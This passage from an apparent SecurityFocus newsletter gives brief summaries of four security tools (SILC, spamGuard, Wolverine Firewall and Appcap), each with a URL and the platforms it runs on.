SILC (Secure Internet Live Conferencing) is a protocol which provides secure conferencing services on the Internet over insecure channels. SILC superficially resembles IRC, although they are very different internally. The purpose of SILC is to provide secure conferencing services. Strong cryptographic methods are used to secure all traffic. SILC is delivered as SILC Client for end users, SILC Server for system administrators, and SILC Toolkit for application developers.

2. EnderUNIX spamGuard v1.0
by EnderUNIX Team
Relevant URL: http://www.enderunix.org/spamguard/
Platforms: Linux, POSIX, UNIX
Summary:
spamGuard is a small application that automagically monitors spammer activity in mail server logs. For the time being, the program supports the qmail MTA and features multilog logging.

3. Wolverine Firewall v.99a
by Terry Varga wolverine@webworxmedia.com
Relevant URL: http://webworxmedia.com/Wolverine/
Platforms: Linux
Summary:
Wolverine Firewall is a set of shell scripts designed to step you through the setup of IPTABLES firewalling for servers.

4. Appcap v0.12
by Paul Starzetz
Relevant URL: http://appcap.ihaquer.com/
Platforms: Linux
Summary:
Appcap is a tricky application for x86 Linux which allows a user with enough power (usually the superuser) on a machine to attach and redirect standard input and output of any application to his/her actual tty.
In this way the superuser obtains an instrument for looking into ordinary users' sessions. This may be very useful if you suspect some of your users of doing nasty things from your machine.

VI. SPONSORSHIP INFORMATION
---------------------------
This issue is sponsored by SecurityFocus (http://www.securityfocus.com)

-------------------------------------------------------------------------------